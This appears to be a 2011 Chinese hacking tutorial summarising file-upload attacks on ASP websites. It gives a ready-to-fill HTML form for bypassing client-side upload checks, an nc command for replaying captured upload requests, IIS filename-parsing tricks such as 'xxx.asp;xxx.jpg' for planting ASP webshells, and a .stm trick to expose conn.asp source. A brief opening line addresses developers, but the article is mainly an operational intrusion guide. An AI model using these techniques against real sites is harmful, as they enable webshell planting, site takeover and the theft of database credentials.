脚本入侵-上传漏洞总结篇(臭小子)

  发布时间:2011-04-24 15:44:59   作者:佚名   我要评论
脚本入侵-上传漏洞总结篇(臭小子),从事于网站开发的程序员要看下,不要让自己的程序别黑客利用。
1:抓包上传
我们可以用WSockExpert(抓包工具) hkcpost抓包提交软件或等等抓包工具
说下hkcpost有时候电脑打不开WSockExpert(抓包工具) 我们就用这工具
很好用
说到抓包上传 比如一个上传地址http://site/upload.asp
或后台管理后台上传地址
我们就抓包cookies 参数 和文件上传成功地址
然后用明小子或等等抓包工具 上传。大家可以去百度搜索相关的教程和文章看看


2:抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如hack92.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<hack92.txt
大家可以去百度搜索下nc上传 或突破 等等教程文章看


3:本地上传漏洞
把下面的代码 保存为hack92.html
------------------------------
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="把上传地址复制这里到这里" method=post
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
------------------------------------------
添加上传地址
把<FORM name=form1 action="把上传地址复制这里到这里" method=post
把:把上传地址复制这里到这里 你的上传地址
然后打开hack92.html 出现两个页面 第一个上你的图片木马 然后在上你的ASP木马
提示在上asp木马记得 加个空格


4:iis漏洞
把我们的asp木马 改成xxx.asp;xxx.jpg 或xxx.asp.jpg
或建立asp.asp asa.asa 目录 上图片asp木马


5:上传突破
当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!


大家可以去百度搜索相关的文章和教程

相关文章

最新评论